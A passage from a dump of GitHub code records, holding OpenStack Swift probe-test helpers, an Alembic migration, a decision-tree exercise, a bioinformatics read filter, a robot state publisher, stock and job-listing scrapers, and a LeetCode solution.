__doc__ attribute, sometimes empty\n docs[attr] = (getattr(value, '__doc__', None) or\n 'perform the %s command' % attr).strip()\n attrs['__commands__'] = commands\n attrs['__docs__'] = docs\n\n def run(self, command, *args, **kwargs):\n return self.__commands__[command](self, *args, **kwargs)\n attrs.setdefault('run', run)\n return type(name, bases, attrs)\n\n\ndef command(f):\n f.__command__ = True\n return f\n\n\n@six.add_metaclass(meta_command)\nclass BaseBrain(object):\n def _setup(self, account, container_name, object_name,\n server_type, policy):\n self.account = account\n self.container_name = container_name\n self.object_name = object_name\n server_list = ['%s-server' % server_type] if server_type else ['all']\n self.servers = Manager(server_list)\n policies = list(ENABLED_POLICIES)\n random.shuffle(policies)\n self.policies = itertools.cycle(policies)\n\n o = object_name if server_type == 'object' else None\n c = container_name if server_type in ('object', 'container') else None\n if server_type in ('container', 'account'):\n if policy:\n raise TypeError('Metadata server brains do not '\n 'support specific storage policies')\n self.policy = None\n self.ring = ring.Ring(\n '/etc/swift/%s.ring.gz' % server_type)\n elif server_type == 'object':\n if not policy:\n raise TypeError('Object BrainSplitters need to '\n 'specify the storage policy')\n self.policy = policy\n policy.load_ring('/etc/swift')\n self.ring = policy.object_ring\n else:\n raise ValueError('Unknown server_type: %r' % server_type)\n self.server_type = server_type\n\n self.part, self.nodes = self.ring.get_nodes(self.account, c, o)\n\n self.node_numbers = [n['id'] + 1 for n in self.nodes]\n if 1 in self.node_numbers and 2 in self.node_numbers:\n self.primary_numbers = (1, 2)\n self.handoff_numbers = (3, 4)\n else:\n self.primary_numbers = (3, 4)\n self.handoff_numbers = (1, 2)\n\n @command\n def start_primary_half(self):\n \"\"\"\n start servers 1 & 2\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.primary_numbers)\n\n @command\n def stop_primary_half(self):\n \"\"\"\n stop servers 1 & 2\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.primary_numbers)\n\n @command\n def start_handoff_half(self):\n \"\"\"\n start servers 3 & 4\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.handoff_numbers)\n\n @command\n def stop_handoff_half(self):\n \"\"\"\n stop servers 3 & 4\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.handoff_numbers)\n\n @command\n def put_container(self, policy_index=None):\n \"\"\"\n put container with next storage policy\n \"\"\"\n\n if policy_index is not None:\n policy = POLICIES.get_by_index(int(policy_index))\n if not policy:\n raise ValueError('Unknown policy with index %s' % policy)\n elif not self.policy:\n policy = next(self.policies)\n else:\n policy = self.policy\n\n headers = {'X-Storage-Policy': policy.name}\n self.client.put_container(self.container_name, headers=headers)\n\n @command\n def delete_container(self):\n \"\"\"\n delete container\n \"\"\"\n self.client.delete_container(self.container_name)\n\n @command\n def put_object(self, headers=None, contents=None):\n \"\"\"\n issue put for test object\n \"\"\"\n self.client.put_object(self.container_name, self.object_name,\n headers=headers, contents=contents)\n\n @command\n def delete_object(self):\n \"\"\"\n issue delete for test object\n \"\"\"\n self.client.delete_object(self.container_name, self.object_name)\n\n @command\n def get_object(self):\n \"\"\"\n issue GET for test object\n \"\"\"\n return self.client.get_object(self.container_name, self.object_name)\n\n\nclass PublicBrainClient(object):\n def __init__(self, url, token):\n self.url = url\n self.token = token\n self.account = utils.split_path(urlparse(url).path, 2, 2)[1]\n\n def put_container(self, container_name, headers):\n return client.put_container(self.url, self.token, container_name,\n headers=headers)\n\n def post_container(self, container_name, headers):\n return client.post_container(self.url, self.token, container_name,\n headers)\n\n def delete_container(self, container_name):\n return client.delete_container(self.url, self.token, container_name)\n\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return client.put_object(self.url, self.token, container_name,\n object_name, headers=headers,\n contents=contents, query_string=query_string)\n\n def delete_object(self, container_name, object_name):\n try:\n client.delete_object(self.url, self.token,\n container_name, object_name)\n except ClientException as err:\n if err.http_status != HTTP_NOT_FOUND:\n raise\n\n def head_object(self, container_name, object_name):\n return client.head_object(self.url, self.token, container_name,\n object_name)\n\n def get_object(self, container_name, object_name, query_string=None):\n return client.get_object(self.url, self.token,\n container_name, object_name,\n query_string=query_string)\n\n\ndef translate_client_exception(m):\n @functools.wraps(m)\n def wrapper(*args, **kwargs):\n try:\n return m(*args, **kwargs)\n except UnexpectedResponse as err:\n raise ClientException(\n err.args[0],\n http_scheme=err.resp.environ['wsgi.url_scheme'],\n http_host=err.resp.environ['SERVER_NAME'],\n http_port=err.resp.environ['SERVER_PORT'],\n http_path=quote(err.resp.environ['PATH_INFO']),\n http_query=err.resp.environ['QUERY_STRING'],\n http_status=err.resp.status_int,\n http_reason=err.resp.explanation,\n http_response_content=err.resp.body,\n http_response_headers=err.resp.headers,\n )\n return wrapper\n\n\nclass InternalBrainClient(object):\n\n def __init__(self, conf_file, account='AUTH_test'):\n self.swift = InternalClient(conf_file, 'probe-test', 3)\n self.account = account\n\n @translate_client_exception\n def put_container(self, container_name, headers):\n return self.swift.create_container(self.account, container_name,\n headers=headers)\n\n @translate_client_exception\n def post_container(self, container_name, headers):\n return self.swift.set_container_metadata(self.account, container_name,\n headers)\n\n @translate_client_exception\n def delete_container(self, container_name):\n return self.swift.delete_container(self.account, container_name)\n\n def parse_qs(self, query_string):\n if query_string is not None:\n return {k: v[-1] for k, v in parse_qs(query_string).items()}\n\n @translate_client_exception\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return self.swift.upload_object(BytesIO(contents), self.account,\n container_name, object_name,\n headers=headers,\n params=self.parse_qs(query_string))\n\n @translate_client_exception\n def delete_object(self, container_name, object_name):\n return self.swift.delete_object(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def head_object(self, container_name, object_name):\n return self.swift.get_object_metadata(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def get_object(self, container_name, object_name, query_string=None):\n status, headers, resp_iter = self.swift.get_object(\n self.account, container_name, object_name,\n params=self.parse_qs(query_string))\n return headers, b''.join(resp_iter)\n\n\nclass BrainSplitter(BaseBrain):\n def __init__(self, url, token, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = PublicBrainClient(url, token)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nclass InternalBrainSplitter(BaseBrain):\n def __init__(self, conf, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = InternalBrainClient(conf)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nparser = OptionParser('%prog [options] '\n '[:[,...]] [...]')\nparser.usage += '\\n\\nCommands:\\n\\t' + \\\n '\\n\\t'.join(\"%s - %s\" % (name, doc) for name, doc in\n BrainSplitter.__docs__.items())\nparser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),\n help='set container name')\nparser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),\n help='set object name')\nparser.add_option('-s', '--server_type', default='container',\n help='set server type')\nparser.add_option('-P', '--policy_name', default=None,\n help='set policy')\n\n\ndef main():\n options, commands = parser.parse_args()\n if not commands:\n parser.print_help()\n return 'ERROR: must specify at least one command'\n for cmd_args in commands:\n cmd = cmd_args.split(':', 1)[0]\n if cmd not in BrainSplitter.__commands__:\n parser.print_help()\n return 'ERROR: unknown command %s' % cmd\n url, token = get_auth(PROXY_BASE_URL + '/auth/v1.0',\n 'test:tester', 'testing')\n if options.server_type == 'object' and not options.policy_name:\n options.policy_name = POLICIES.default.name\n if options.policy_name:\n options.server_type = 'object'\n policy = POLICIES.get_by_name(options.policy_name)\n if not policy:\n return 'ERROR: unknown policy %r' % options.policy_name\n else:\n policy = None\n brain = BrainSplitter(url, token, options.container, options.object,\n options.server_type, policy=policy)\n for cmd_args in commands:\n parts = cmd_args.split(':', 1)\n command = parts[0]\n if len(parts) > 1:\n args = utils.list_from_csv(parts[1])\n else:\n args = ()\n try:\n brain.run(command, *args)\n except ClientException as e:\n print('**WARNING**: %s raised %s' % (command, e))\n print('STATUS'.join(['*' * 25] * 2))\n brain.servers.status()\n sys.exit()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"openstack/swift","sub_path":"test/probe/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":13515,"program_lang":"python","lang":"en","doc_type":"code","stars":2518,"dataset":"github-code","pt":"39"}
+{"seq_id":"35997209613","text":"\"\"\"add sername\n\nRevision ID: 95c9c965f366\nRevises: f6eda7049057\nCreate Date: 2023-01-25 13:13:56.030336\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '95c9c965f366'\ndown_revision = 'f6eda7049057'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('surname', sa.String(length=32), server_default='ivanov', nullable=True))\n\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('rating', sa.Integer(), server_default='1', nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.drop_column('rating')\n\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.drop_column('surname')\n\n # ### end Alembic commands ###\n","repo_name":"EvgeniDorofeevskiy/flask2","sub_path":"migrations/versions/95c9c965f366_add_sername.py","file_name":"95c9c965f366_add_sername.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70159971633","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree, export_graphviz, export_text\n\n\ntrain = pd.read_excel('data/lendingclubtraindata.xlsx')\nvalidation=pd.read_excel('data/lendingclubvaldata.xlsx')\ntest=pd.read_excel('data/lendingclubtestdata.xlsx')\n\n\n# store target column\ny_train = train['loan_status']\ny_val=validation['loan_status']\ny_test=test['loan_status']\n\n# exercise 1\nprob_1=len(y_train[y_train==1])/len(y_train)\nprob_2=1.0-prob_1\nprint(\"Initial entropy=\",-prob_1*np.log2(prob_1)-prob_2*np.log2(prob_2))\n\n# exercise 2\n# From the dataset we have that 60.40% own their home and 39.60% rent.\nhome_owners=train[train.home_ownership==1]\nhome_owner_prob=len(home_owners)/len(y_train)\nprint('prob own home=',home_owner_prob)\n# Loans were fully paid for 81.72 % of those who owned their home\nhome_owners_paid=home_owners[home_owners.loan_status==1]\nprob_home_owner_paid=len(home_owners_paid)/len(home_owners)\nprint('prob own home and paid =',prob_home_owner_paid)\n\n# 75.29% of those who rented paid their loans\nhome_rent=train[train.home_ownership==0]\nhome_rent_paid=home_rent[home_rent.loan_status==1]\nprob_home_rent_paid=len(home_rent_paid)/len(home_rent)\nprint('prob own rent and paid =',prob_home_rent_paid)\n\n# , the entropy is\n# 0.6040(−0.8172 ln(0.8172) − 0.1828 ln(0.1828))\n# + 0.3960(−0.7529 ln(0.7529) − 0.2471 ln(0.2471)) = 0.7339\n# So the reduction in entropy if we use this feature is 0.7382 − 0.7339 = 0.0043\n\n# exercise 3\n\n# remove target column to create feature only dataset\nX_train = train.drop('loan_status',axis=1)\nX_val=validation.drop('loan_status',axis=1)\nX_test=test.drop('loan_status',axis=1)\n\n\nclf = DecisionTreeClassifier(criterion='entropy',max_depth=4,min_samples_split=1000,min_samples_leaf=200,random_state=0)\nclf = clf.fit(X_train,y_train)\n# fig, ax = plt.subplots(figsize=(40, 30))\n# plot_tree(clf, filled=True, feature_names=X_train.columns, proportion=True)\n# plt.show()\n\ntrain_score=clf.score(X_train,y_train)\ntest_score=clf.score(X_test,y_test)\n\nprint('train_score=',train_score)\nprint('test_score=',test_score)\n","repo_name":"eightsmile/cqf","sub_path":"Module4/Lec6_DecisionTree/CQF_January_2023_M4L6_Solutions-1/loanclub.py","file_name":"loanclub.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"}
+{"seq_id":"8971398385","text":"import dr_tools, sys, pysam\nimport os, argparse\nfrom joblib import Parallel, delayed\nsys.path.insert(0, '../src')\nimport GenomeFetch\n\n\"\"\"\nThis script removes reads when 3' has TGG on the genome\nWorks for smallrna star folder. aka max32, max38\n\n>adapter_three_prime\nTGGAATTCTCGGGTGCCAAGG\n>polyA\nAAAAAAAAAAAAA\n\"\"\"\n\ndef safe_mkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\t\tos.chmod(path, 0o774)\n\ndef remove_reads_from_precursor(inbam):\n\n\t\"\"\"\n\tprepare input/output files\n\t\"\"\"\n\tinbamPysamObj = pysam.Samfile(inbam, \"rb\" )\n\tp = inbam.split(\"/\")\n\toutbamTmp = \"/\".join(p[:-3]+[o.outstardir]+p[-2:])\n\tbam_out = \".\".join(outbamTmp.split(\".\")[:-1]) + \"_tmp.bam\"\n\tbam_out_sorted = \".\".join(outbamTmp.split(\".\")[:-1])\n\toutbam = pysam.Samfile(bam_out, \"wb\", template=inbamPysamObj)\n\n\t\"\"\"\n\tcreate genome fetch object\n\t\"\"\"\n\tgf = GenomeFetch.GenomeFetch(genomedir=o.genome_dir)\n\n\t\"\"\"\n\tremove reads when 3' has TGG on the genome\n\t\"\"\"\n\tfor read in inbamPysamObj:\n\t\tread_name = read.qname\n\t\ttid = read.rname\n\t\treadchr = inbamPysamObj.getrname(tid)\n\t\treadstart = int(read.pos) + 1\n\t\treadend = read.aend\n\t\tstrand = read.flag\n\t\treadlen = len(read.seq) #this is the actual read length (41M, means readlen=41)\n\t\tread_len = read.qlen #this only considers matches (8S30M, means read_len=30)\n\t\tminRlen = o.minRlen\n\t\tif readlen <= o.readlen_cutoff:\n\t\t\toutbam.write(read)\n\t\t\tcontinue\n\t\t\n\t\tif strand ==0: #read maps to forward strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readend+1, readend+upperlimit)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"T\" or bpwindow == \"A\"): continue #TGGAATTCTCGGGTGCCAAGG\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"TG\" or bpwindow == \"AA\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"TGG\" or bpwindow == \"AAA\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TGGA\" or bpwindow == \"AAAA\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TGGAA\" or bpwindow == \"AAAAA\"): continue\n\t\t\telse: outbam.write(read)\n\n\t\telif strand ==16: #read maps to reverse strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readstart-upperlimit, readstart-1)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"A\" or bpwindow == \"T\"): continue #TTCCA\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"CA\" or bpwindow == \"TT\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"CCA\" or bpwindow == \"TTT\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TCCA\" or bpwindow == \"TTTT\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TTCCA\" or bpwindow == \"TTTTT\"): continue\n\t\t\telse: outbam.write(read)\n\n\toutbam.close()\n\t#sort and index the final bam file\n\tpysam.sort(bam_out, bam_out_sorted)\t\n\tpysam.index(bam_out_sorted+\".bam\", template=inbamPysamObj)\n\tos.remove(bam_out)\n\n#main function\nif '__main__' == __name__:\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-i', '--instardir', required=True)\n\tparser.add_argument('-o', '--outstardir', required=True)\n\tparser.add_argument('-g', '--genome_dir', default=\"path_to_reference_genome\")\n\tparser.add_argument('-c', '--readlen_cutoff', default=35)\n\tparser.add_argument('-x', '--minRlen', default=41, type=int) #minimum read length to define a precursor\n\tparser.add_argument('-p', '--numCPU', default=20, type=int)\n\to = parser.parse_args()\n\n\tif not os.path.exists(o.outstardir): safe_mkdir(o.outstardir)\n\n\tsample_names = os.listdir(o.instardir)\n\tsamplenames_with_fullpath = []\n\tfor sample in sample_names:\n\t\t##prepare input files\n\t\tbam = os.path.join(o.instardir, sample, \"%s.bam\" %sample)\n\t\tsamplenames_with_fullpath.append(bam)\n\n\t\tpath_outbam = os.path.join(o.outstardir, sample)\n\t\tif not os.path.exists(path_outbam): safe_mkdir(path_outbam)\n\n\tParallel(n_jobs=o.numCPU)(delayed(remove_reads_from_precursor)(sample) for sample in samplenames_with_fullpath)\n\n","repo_name":"eyay/smallseq","sub_path":"src/remove_reads_with_genomic_TGG.py","file_name":"remove_reads_with_genomic_TGG.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"43564886608","text":"#!/usr/bin/env python\n#\n# Gets robot state and publishes as tf transform\nimport rospy\nfrom tf2_ros import TFMessage\nfrom sensor_msgs.msg import JointState\nimport argparse\nimport rbd_spot\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Publish Spot RobotState as TF messages\")\n parser.add_argument(\"--root-frame\", type=str, help=\"The name of the root frame of the TF tree\",\n default=\"body\")\n args, _ = parser.parse_known_args()\n\n rospy.init_node(\"spot_state_tf_publisher\")\n conn = rbd_spot.SpotSDKConn(sdk_name=\"StateTFPublisher\")\n robot_state_client = rbd_spot.state.create_client(conn)\n tf_pub = rospy.Publisher('/tf', TFMessage, queue_size=10)\n js_pub = rospy.Publisher('/joint_states', JointState, queue_size=10)\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n state = rbd_spot.state.getRobotState(robot_state_client)\n tf_msg = rbd_spot.state.get_tf_from_state(state, conn, args.root_frame)\n js_msg = rbd_spot.state.get_joint_state_from_state(state, conn)\n\n tf_pub.publish(tf_msg)\n js_pub.publish(js_msg)\n print(\"published\")\n rate.sleep()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zkytony/robotdev","sub_path":"spot/ros_ws/src/rbd_spot_robot/scripts/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"22866323765","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_bs_obj(company_code):\r\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\r\n result = requests.get(url)\r\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\r\n return bs_obj\r\n\r\n# bs_obj를 받아서 price를 return하게\r\ndef get_price(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\r\n blind_now = no_today.find(\"span\", {\"class\": \"blind\"})\r\n return blind_now.text\r\n\r\n# bs_obj를 받아서 candle_chart_data를 return하게\r\ndef get_candle_chart_data(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n td_first = bs_obj.find(\"td\", {\"class\":\"first\"})\r\n blind = td_first.find(\"span\", {\"class\":\"blind\"})\r\n\r\n #close 종가(전일)\r\n close = blind.text\r\n\r\n return close\r\n\r\n# samsung 005930\r\n# naver 035420\r\n# kakao 035720\r\ncompany_codes = [\"005930\", \"035420\", \"035720\"]\r\nfor item in company_codes:\r\n price = get_price(item)\r\n close = get_candle_chart_data(item)\r\n print(price, close)\r\n\r\n\r\n\r\n\r\n","repo_name":"ehdalseorka1/crowling","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5675295109","text":"#Automation Package\nfrom playwright.sync_api import sync_playwright\nimport time\n#Scraping Package\nfrom selectolax.parser import HTMLParser\nfrom bs4 import BeautifulSoup as bs\n#Preprosscsing Package\nimport pandas as pd\nimport numpy as np\nimport re\nfrom datetime import datetime as dt\nimport json\nimport os\n##################################################\n#Create Automating Page\nwith sync_playwright() as playwright:\n #Launch the browser and go to the page\n browser = playwright.chromium.launch(headless=False , slow_mo=200)\n page = browser.new_page()\n page.set_viewport_size({'width':1920,'height':1080})\n page.goto('https://www.glassdoor.com/Job',wait_until='domcontentloaded')\n\n\n\n #Adjust Resarch Job and Filters\n page.get_by_placeholder('Find your perfect job').type('Data Analyst',delay=200) #Write Data Analyst in job research\n page.locator('div input[value=\"Data Analyst\"]').press('Enter') #Press Enter\n page.wait_for_timeout(2000) # Wait for several milliseconds\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").type('Remote',delay=200)#Write Remote in location research\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").press('ArrowDown+Enter')#Press Arrow Down Enter to choose the first result\n page.wait_for_timeout(1000) # Wait for several milliseconds\n page.locator(\"div > [data-test='DATEPOSTED']:visible\").click() #Click in Dateposted to make it visible\n # If Last 3 Days not found\n try:\n page.locator(\"button[value='3']\").click() # Choose the Last 3 Days\n except:\n page.locator(\"button[value='1']\").click() # Choose the last 3 Days\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.locator(\"div [data-test='sort-by-header']:visible\").click()# Make sort header visible\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.get_by_role('button',name='Recent').click() # Sort by recent res\n\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait for selector\n \n def iter_each_job(Jobs):\n '''\n This function take all 30 jobs in the page and loop\n for each one of them to extract more info about each job\n like job_description , salray , about the company and more\n finaly store the result in the genrator to loop on it in another time\n '''\n for i in range(len(Jobs)):\n page.locator(\"li[class*='react-job-listing']\").all()[i].click()\n page.wait_for_timeout(2000)# Wait for several milliseconds\n if page.locator(\"div[class*='actionBar'] > button\").count() == 1:# Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body') \n else: \n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body')\n\n\n # html_bodies = iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()) \n\n def scrape_data(body):\n '''\n This function works to store the data in json list of dict\n first loop over all right continer jobs in the page to\n just get the job title , company title ,location and date posted\n from the main body of html\n '''\n \n html = HTMLParser(body) # parse the the body of html page to dealing with it using css selector\n df=[{\n 'Job_Title':title.text(),#Extract the Job Title\n 'Company_Title':re.sub(r'[^A-z]',' ',company.text()).strip(), # Substract all anything except string than get the string\n 'Location':location.text(),#Extract the Location of the company\n 'Date_Posted':dt.strftime(dt.now() - pd.Timedelta(value= int(re.findall(r'\\d',date_posted.text())[0]), unit='D'),'%Y-%m-%d') if re.findall(r'[A-z]',date_posted.text())[0].lower() != 'h' else dt.strftime(dt.now(),'%Y-%m-%d'),\n } # if the date posted is 24h i'll return the today's day in date formating else the date posted like 5d i'll substract 5 days from today's date and return it in formating date \n for title ,company ,location, date_posted in zip(html.css(\"div [class*='job-title']\"),html.css(\"div [id*=job-employer]\"),html.css(\"div[class*='location mt-xxsm']\"),html.css(\"div [data-test='job-age']\"))] \n \n # Loop for each job to get the job describtion and more info about the company\n df_desc = []\n for job in iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()):\n html_desc = HTMLParser(job) # parse the first html of the job desc\n if len(html_desc.css(\"#CompanyContainer\")) != 0 : # Check if there is a comany over view container\n company_over_view = {company_overview_matric.text().lower():company_overview_value.text().lower() for company_overview_matric,company_overview_value in zip(html_desc.css(\"#CompanyContainer div span[class*='1taruhi']\"),html_desc.css(\"#CompanyContainer div span[class*='i9gxme']\"))} \n df_desc.append(# First, I have to iterate on the key and the value for each container I did a dictionary because there are some jobs that have incomplete information and without order\n {'Size' : company_over_view['size'] if 'size' in company_over_view.keys() else np.NaN,\n 'Founded' : int(company_over_view['founded']) if 'founded' in company_over_view.keys() else np.NaN,\n 'Type' : company_over_view['type'] if 'type' in company_over_view.keys() else np.NaN,\n 'Industry' : company_over_view['industry'] if 'industry' in company_over_view.keys() else np.NaN,\n 'Sector' : company_over_view['sector'] if 'sector' in company_over_view.keys() else np.NaN,\n 'Revenue' : company_over_view['revenue'] if 'revenue' in company_over_view.keys() else np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n else: # If the comany over view container fill all the data with null values\n df_desc.append(\n {'Size' : np.NaN,\n 'Founded' : np.NaN,\n 'Type' : np.NaN,\n 'Industry' : np.NaN,\n 'Sector' : np.NaN,\n 'Revenue' : np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n\n # #Update the dictionaries with each other\n for z , zz in zip(df , df_desc):\n z.update(zz)\n Data_Frame = df\n \n\n return Data_Frame\n \n\n def Create_newfile(your_filename):\n # Check If the file is exists if not create new one\n '''\n This function take your file name to create a new file if\n the file dosen't exists and if not remove the exists file\n which's contains the old data and create new one that \n will has the new data in it\n '''\n if os.path.exists(your_filename) :\n os.remove(your_filename)\n open(your_filename,'w').close()\n else:\n open(your_filename,'w').close()\n\n Create_newfile('Glassdoor.json')\n \n\n # Write data into json file\n def write_json(data , filename):\n '''\n This function takes the data that you wanna write\n and the file name and it'll automatice write the data\n and close the file \n '''\n with open(filename , 'w') as file: \n json.dump(data , file,indent=4)\n file.close()\n\n def append_new_data(new_data , filename):\n '''\n this function takes the new data that you wanna append to\n the json file and the file name and\n '''\n # first read the json file to load the old data\n with open(filename,'r') as file:\n old_data = json.load(file)\n for data in new_data:\n old_data.append(data) # loop through list of dict to append each dict \n all_data = old_data\n write_json(all_data,filename)# now update the json file by writing all data \n file.close()\n \n\n num_pages = int(page.locator(\"div[class='paginationFooter']\").inner_text().split(' ')[-1]) # Extract the number of pages \n counter = 0\n while counter < num_pages: # Loop for number of pages \n \n if page.locator(\"div[class*='actionBar'] > button\").count() == 1: # Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n\n # else: # there is no register page\n data = scrape_data(page.inner_html('body')) # Extract the body of the page\n\n # Store The Data in json file\n #Using try and except to avoid the error which will happen because the empty file\n try:\n append_new_data(data , 'Glassdoor.json')#Second, the function will append the new data, and the first time the file will be empty of course I got an error so I should use the write function first to write the data\n except: \n write_json(data , 'Glassdoor.json')#Third for only the first time I gonna use the right function directly but then I gonna use it from the append function to write the new data \n\n if counter > 0 and page.locator('button[disabled]').count() == 1:# th break the last page\n break\n\n page.get_by_role('button',name='Next').click() # Move to the next page\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait untile the selector load\n \n page.wait_for_timeout(3000) # # Wait for several milliseconds \n \n counter += 1\n\n page.close()\n \n\n","repo_name":"bhr100/Data-Analyst-Jobs","sub_path":"Jobs-Scraper.py","file_name":"Jobs-Scraper.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"70341084204","text":"from collections import defaultdict\n\n\nclass UndergroundSystem:\n\n def __init__(self):\n self.journey = defaultdict()\n self.history = defaultdict()\n \n def checkIn(self, id: int, startStation: str, t: int) -> None:\n self.journey[id] = (startStation, t)\n \n\n def checkOut(self, id: int, endStation: str, endTime: int) -> None:\n startStation, startTime = self.journey.pop(id)\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n self.history[key] = (allTime + (endTime - startTime), allCount + 1)\n \n def getAverageTime(self, startStation: str, endStation: str) -> float:\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n return allTime / allCount\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\nobj = UndergroundSystem()\nobj.checkIn(1, \"dhaka\", 23)\nobj.checkOut(1, \"kishoreganj\", 30)\nt = obj.getAverageTime(\"dhaka\", \"kishoreganj\")\nprint(t)","repo_name":"fkshohag/All-algorithm","sub_path":"Online-judge/leetcode/design-underground-system.py","file_name":"design-underground-system.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
